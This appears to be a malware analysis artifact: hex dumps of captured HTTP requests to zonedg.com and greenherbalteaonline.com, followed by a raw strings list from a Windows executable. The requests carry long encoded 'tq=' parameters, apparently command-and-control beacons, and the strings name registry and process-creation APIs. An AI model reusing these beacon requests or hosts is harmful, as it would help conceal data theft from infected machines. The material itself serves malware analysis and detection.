0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   316b5825 32425039 68253242 49307344   1kX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 464d6525 3242636f   OhLgjh%2FMe%2Bco
0x000000c0 (00192)   4a755825 3242534e 786c4b76 39373558   JuX%2BSNxlKv975X
0x000000d0 (00208)   6c6d3547 20485454 502f312e 310d0a48   lm5G HTTP/1.1..H
0x000000e0 (00224)   6f73743a 207a6f6e 6564672e 636f6d0d   ost: zonedg.com.
0x000000f0 (00240)   0a557365 722d4167 656e743a 206d6f7a   .User-Agent: moz
0x00000100 (00256)   696c6c61 2f322e30 0d0a436f 6e74656e   illa/2.0..Conten
0x00000110 (00272)   742d4c65 6e677468 3a20300d 0a436f6e   t-Length: 0..Con
0x00000120 (00288)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000130 (00304)   0d0a7465 726e6574 2e676966 223e0a20   ..ternet.gif">. 
0x00000140 (00320)   203c2f62 6f64793e 0a3c2f68 746d6c3e    </body>.</html>
0x00000150 (00336)   0a2f703e 0a20203c 6872202f 3e0a2020   ./p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   316b5825 32425039 68253242 49307344   1kX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 42537225 32466525   OhLgjh88BSr%2Fe%
0x000000c0 (00192)   32425635 5a755267 25334425 33442048   2BV5ZuRg%3D%3D H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a207a   TTP/1.1..Host: z
0x000000e0 (00224)   6f6e6564 672e636f 6d0d0a55 7365722d   onedg.com..User-
0x000000f0 (00240)   4167656e 743a206d 6f7a696c 6c612f32   Agent: mozilla/2
0x00000100 (00256)   2e300d0a 436f6e74 656e742d 4c656e67   .0..Content-Leng
0x00000110 (00272)   74683a20 300d0a43 6f6e6e65 6374696f   th: 0..Connectio
0x00000120 (00288)   6e3a2063 6c6f7365 0d0a0d0a 72633d22   n: close....rc="
0x00000130 (00304)   696e7465 726e6574 2e676966 223e0a20   internet.gif">. 
0x00000140 (00320)   203c2f62 6f64793e 0a3c2f68 746d6c3e    </body>.</html>
0x00000150 (00336)   0a724955 7a434569 4a395762 4e6f7643   .rIUzCEiJ9WbNovC
0x00000160 (00352)   434a4c78 736d7037 68482532 42526a39   CJLxsmp7hH%2BRj9
0x00000170 (00368)   7169746a 72474d6b 52647725 3242797a   qitjrGMkRdw%2Byz
0x00000180 (00384)   4446656f 3671564e 70393451 62782532   DFeo6qVNp94Qbx%2
0x00000190 (00400)   42636966 6f37734f 33253242 58796365   Bcifo7sO3%2BXyce
0x000001a0 (00416)   4779776a 31766c46 4a423953 73443550   Gywj1vlFJB9SsD5P
0x000001b0 (00432)   58545669 77547976 587a5543 387a4e74   XTViwTyvXzUC8zNt
0x000001c0 (00448)   7a6a3579 4b757369 61577048 63425641   zj5yKusiaWpHcBVA
0x000001d0 (00464)   25324231 72723267 77495862 71616976   %2B1rr2gwIXbqaiv
0x000001e0 (00480)   4e52655a 326e724b 62495479 43316925   NReZ2nrKbITyC1i%
0x000001f0 (00496)   32427971 33666f25 3246634f 4b4d544e   2Byq3fo%2FcOKMTN
0x00000200 (00512)   68517876 43557761 4e4c2532 464d6239   hQxvCUwaNL%2FMb9
0x00000210 (00528)   6363786b 6c443657 7261306c 4a6c7045   ccxklD6Wra0lJlpE
0x00000220 (00544)   30204854 54502f31 2e300d0a 436f6e6e   0 HTTP/1.0..Conn
0x00000230 (00560)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000240 (00576)   6f73743a 20677265 656e6865 7262616c   ost: greenherbal
0x00000250 (00592)   7465616f 6e6c696e 652e636f 6d0d0a41   teaonline.com..A
0x00000260 (00608)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x00000270 (00624)   2d416765 6e743a20 6d6f7a69 6c6c612f   -Agent: mozilla/
0x00000280 (00640)   322e300d 0a0d0a                       2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   316b5825 32425039 68253242 49307344   1kX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683873 47253242 636f4a75   OhLgjh8sG%2BcoJu
0x000000c0 (00192)   58253242 534e7756 4b763937 35586c6d   X%2BSNwVKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6564 672e636f 6d0d0a55   t: zonedg.com..U
0x000000f0 (00240)   7365722d 4167656e 743a206d 6f7a696c   ser-Agent: mozil
0x00000100 (00256)   6c612f32 2e300d0a 436f6e74 656e742d   la/2.0..Content-
0x00000110 (00272)   4c656e67 74683a20 300d0a43 6f6e6e65   Length: 0..Conne
0x00000120 (00288)   6374696f 6e3a2063 6c6f7365 0d0a0d0a   ction: close....
0x00000130 (00304)   0d0a7465 726e6574 2e676966 223e0a20   ..ternet.gif">. 
0x00000140 (00320)   203c2f62 6f64793e 0a3c2f68 746d6c3e    </body>.</html>
0x00000150 (00336)   0a2f703e 0a20203c 6872202f 3e0a2020   ./p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

Strings

080904b0
1.0.0.1
1468
&All Exit        Shift+C
&exit
FileVersion
PrivateBuild
ProductVersion
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
```````````
^)'(  
~~~~~~~~~~~~~
=======
||||||
 `}@_	
    ^^^
      
       
                 @@@@@@
_______
!!!!!!!!
!@@@@@@@
..........
.@@<]]
(((((((
[[[[[	
}:::::
}}}};;
}}}}}}
@@]]]]]
$$$$$$$$$
$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$
$$$$++
&&@@@@
&&&&&&&&&&&&&&&&
&&&&&&&&&&&&&&&&~~~~~~
############
%)<}@, 
%%%%%%%
						
							
									
000000
@ 00,@ x[?M
05or%.!
0A!Q:"
 !0@B9
+0:E`5
0L[_u%
+%0u	v
#0w@kP
0W_VWL<K
&&&&&&&&&&111111111111
11KKKKKKKKKK
1						bbb
1fO-LR
1p======
1}q?YN
@#1USv\
1XHoYs 
1X;YTv$
&@@1z+p
2)@(*>
222222
222222222222222222222222OOOOOO
~~~~~~~2222O:::
222NNuuuuuuuu
(2^m(/WN'
!2 Rb)
2s}pZhi;
`2v[S$
%%%%%3
33						
33zzzzz
>>>3777777777777777
3	T(ou
4444444444
4KO:!)}
{4kPG:
4L8t:e)
4n;`b"
%|4o-.
4"O< |c
5{{{{{
555555cc
`5aKd#T8
]%5g}c
5^Mb{+
/5NTVH
5	}X;s
%66X4X
6;J"(iWrp!
6*Na	o
@`7. @
77772222GGGGGGGGssssss
7777777
777kffff
77ARU2
@_77oi
7gMo/;
7<#^kHq
7P?i$@`*@
7*@`'T(  
&&&&&888888@@@@@@@@@@@@@
\88xgK
 8	d~J
=8}'VjUp
||<9A{
9F<i$`
""""""""""""a
a3M}'7(
'a7gm0
/////////////_AAA&^^^^^^
AAAAAAAAAAAA6
AARRRRRRRRRR
aD7Df(
ADVAPI32.dll
{aGb& 
aihpi3
_a{N{_
B######
ba7;`C
bbbbbbbbfffff
bbbbbbmmmNNNN
bbbbbbU````
@B	~dh
B:	j3[&%
+B{k@4
^BkkdO
bpCy8W
@@C,@`
c]]^2Y
:c|3Z}?Dy
c4S^h08P
<.c5g0
cccccc
|||||||||ccccjHHHHHHHHHHHHHHH
CCC>>>>>>>>>>~~VV
cEN9|?
C	ff3333gg
`>CF `m
_CG}xJ
CoTaskMemFree
CO%yQO
cQq?%9
CreateProcessA
CreateStdAccessibleObject
CSSSSSSSSS)))))))))
CtfvT0
 c{]w#
CW1AOe
~CW7x0}=
C]whz,
C	=YUg
D}````
/d 3?4s<
D44##Raaaajjjj
|D8r)<W
/DA*Pq6
@.data
!!/ddd
  DDDDD
dddddaa+
DDDDDD
DDDDDDD
DDDDDDDD
DDDDDDDDD
DDDDDDDDDDDDDDDDDDA
`dGx3,
*dL4U(
DR<2RA)`
]e5&  .
`````EE
eeeeeee
~~~eeeeeee
EEEEEEEE
eeeeeeeeeee
EEEEEEEEEEEEEEE
EEEEEEEEEEEEEEEEE)
eeeeeeeeeennn
....eeeggggg
EF]V?T
EKKKKZZZ
E	k-@n>
EMMMMM
EnumResourceNamesA
EuuuT====
%%%%<<<<<<<<<F
F"``%!
F]]][[
 _f?7QAe;-
	FFFFFFF1111111
fffffffffff}}kkkkkkkk
'Fh& @
` Fi'E
 [FkGF
FKoYER
`@Fm$@
fm891*:
$@ Fo_
FV&# {%
FYk9R.
fYuK![_#
G5skLC
G]Chp`M]
GetCPInfoExA
GetSystemTimeAsFileTime
))))GG
GGb}}}}}}}
GGGGAAA
gggggg66
GGGGGGG
[GIxwi
g.y<sd
gzd-lb 
^#ha0e
hBomxah_
#h.dll
^^^^^HHHH
HHHHHH
,,,,,,,,,,,,,HHHHHH
hhhhhhh
hhhhhhhh
?????hhhhhhhhhhhhhhh
 @HlP,A
H[pUX5ym7
& @?hv
[Hwl( 
i@-@4RK
` ;i`6
I6;)3r5
)i89BM
i"""""""AAAA@B
,_________~~~~~iiii
IIIIIIIII
iiiiim%%%%
iJ6" `
I( `l:
InterlockedExchange
IRU7?4{HL.`
IVFk,|/
IZu0-]
@J( `+
j-A#  
jDsYCx"
jgHI8N
J)~h%|I
jj0HHHH
j&`@Ja!
&JJFFFFFF
jjjjjj
JJJJJJJ
jjjjjjjj
JJJJJJJJCCWWWWWWWWWZZZZZZZZZ
jjjjj{{{{{{{{{{{{{TTTTlllllll
)jL"@ 
jmn'?{v
j&rO_w
J'TCokW
^JxQ?O
;J\z)$y= 
/k0IF#/
KERNEL32.dll
?%{K;Gf
~%%KIN
KIO0;V
kkkkkkkkHHHHHHHHH
$$$kkkkkkkkkkkkkkkkkkkkkkkkkkkkk
KLSf.`
@ +Knez`o
KrS	jR0M
K=S0|Be
&  K]snt
kU.N^rS
 L9zV6
l,c:p:
L=I"@ 
L"@`j6
LLL111111"""""
'LLLLL
llllll
llllll   
LLLLLL
lllllllldd
lllllllll
[[[[[[[[[[[llllllllll
Ll:x_?
lO[6	FU
LocalAlloc
LresultFromObject
lstrlenA
l|uj$ `
(]LwE9
_M-,`@
M4)%%d
 `m4}u
mHsU!(
#m(jK}
MLo$@ e
----mmm
MMMMAATT%qq
MMMMMD
mmmmmm
MMMMMM
:mP)$dm
M|+RUq
M>U1aDie
MultiByteToWideChar
` ;+n@
						N,,,
|_n4P}
@?n/&81
NezYWs
NF_en>
nnJJJJJJJJJJJ
@@nnnnnnn
{{{{{{{nnnnnnnnn
NNNNNNNNNNNNNN
]^n(Q(
nqgx(@`
nqr(`@
n,|R1I
Nrh,``
nU	S~	
%nVzrW5
O0_A0qzm
=_>o4M
@o5]t{
@o@6>>_Y
O9Yh[@
OLEACC.dll
~~&&&&&/OO
ooooooo
OOOOOOO
OOOOOOOOOOOOOOOOOOOOOO%%
--------ooott
oooVVVVVyy
O:U1dV4
oU4	mh 
{pbP`7W
PCohAq
P{E%=a
P&` o~
\p}):p	
ppcccc....
PPlE333
      PPPP
"""""ppppp1
PPPPPPllll
PPPPPPP
PPPPPPPPP********************kkkkk3333
PPPPPPPPPPPPPP
P'qfRN
ProgIDFromCLSID
[[[>>>>>q
Q3<l.&2
q3[zS7L
@`Ql#c
qqqqqq
QQQQQQ
qqqqqqqqq}}WWQQUUUU
q`rXDx
. `quOR
QvVpL5
:qw+#{4
qWEHnx
!qYr@e
 @(@`r
RaiseException
 `rDPz
RegCloseKey
RegCreateKeyExA
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyA
RegOpenKeyExA
RegQueryValueExA
RegSetValueExA
.reloc
rMMD}}}}}}}}///
(]rO[h
RqL9!'
rrrrBBBBBB
__'''''''''RRRRRmVVVVVVWWWWWWWWWWWWWWW
rrrrrr
rrrrrrrr88
rrrrrrrrrr
rsD7ZQ
* @S]&
S::::::
@S0CL-]
@{sbe]F
SHELL32.dll
SHGetMalloc
SHGetPathFromIDListA
SHGetSpecialFolderLocation
#[S. `K
s	O!Q^<`
:S.@`S
SSSSSSS
SSSSSSSS
SSSSSSSS\\\\
sssssssss
sssssssssssss''''''GG4444
sssssssssssssssssss
StringFromCLSID
StringFromIID
sZnuin\7IOq
^^^^^T+++++++
T1o\4C
taY?KO
<t"GGd
Thbl%=
!This program cannot be run in DOS mode.
t?;RX|
tS ` I
{tSnl|
Tt0tFE~
tt6)WWWWW
tttttrrrrrrrrr
TTTTxxx
`^:?Tu}
@ TYmO
ue gI8
U/e}m>
^Uf|io
`@@?u\lW
-UmB_Xk
)=uNGTj?
`@u`Sq)o
`utvt*
uT<W2Cx_
$$$$$$$$UUU
uuuu\\\\\\FFFFFFFF
uuuuuu444
UUUUUUUUUUU
/v3>WS
'v7EBuaG
v7{_xP
v`Cc}h4
!v-@gG
V}*H&n
VirtualQueryEx
}[V%TOy*
,``Vuh
vU?V[m
VV,,,,,
v@VdC2
VVVV6666666666
vvvvvv``
VVVVVVV
vvvvvvvBBBB
VVVVVVVVV
VVzz[[|AAAA
 @@{#%w
W4jt!l
W$9z=}
WbY'B[
'WD!8s
w}E`N`
wGZ6\}
_wHs	>
whz(!h5
WideCharToMultiByte
w{mP{]Da
--wwwwwMMM`
WWWWWWW
@`$``-x
 @x=h@{
	?X-ie
 @x}KL
Xp=, @
>x#v:E
xxxxxx
XXXXXX
XXXXXXSS
xxxxxxxxxx
XXXXXXXXXXXXXXX
xxxxxxxxxxxxxxxxxx
@.@@'y
=Y}(``
:Y4P2Fj
Y6UHmO}
``y ` n4+
 y?{_Y
=========YY
YY}}}}}
Yyyyyh
yyyyyyyyyyy
	z2NVss
z;8KQ:
!%zckqQ
* @ZeIp
zFUM,E0
z_n_2y
`@z|pB
Z?y`yu
ZzPs?EC
zzvvvvv
--zzz	""